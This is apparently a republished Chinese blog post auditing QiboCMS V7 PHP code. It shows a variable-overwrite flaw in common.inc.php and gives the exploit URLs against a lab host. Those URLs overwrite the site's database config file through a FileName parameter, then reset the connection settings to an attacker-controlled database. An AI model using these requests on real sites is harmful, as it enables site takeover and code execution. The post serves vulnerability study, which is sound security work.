失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > php代码审计【23】齐博CMS通杀漏洞漏洞

php代码审计【23】齐博CMS通杀漏洞漏洞

时间:2022-01-24 19:33:42

相关推荐

php代码审计【23】齐博CMS通杀漏洞漏洞

一、安装好齐博CMS_V7,安装完成后如下:

二、分析代码

common.inc.php

foreach($_COOKIE AS $_key=>$_value){unset($$_key);}foreach($_POST AS $_key=>$_value){!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];}foreach($_GET AS $_key=>$_value){!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];}

http://192.168.189.129/qibo/do/fujsarticle.php?type=hot

http://192.168.189.129/qibo/do/fujsarticle.php?type=hot&FileName=xxxx.php

重新给filename赋值:,生成新的xxxx.php

这路的思路,就是将原来的数据库文件重新滞空,然后进行

http://192.168.189.129/qibo/do/fujsarticle.php?type=hot&FileName=../data/mysql_config.php(FileName区分大小写)

访问首页:

重新赋值:(数据库换成自己的数据库地址)

http://192.168.189.129/qibo/index.php?dbhost=localhost&dbuser=root&dbpw=root&dbname=qibo_v7&pre=qb_

总结:总体思路,利用变量覆盖来重写数据库文件,然后对数据库文件重写连接服务器,进行代码利用。

如果觉得《php代码审计【23】齐博CMS通杀漏洞漏洞》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。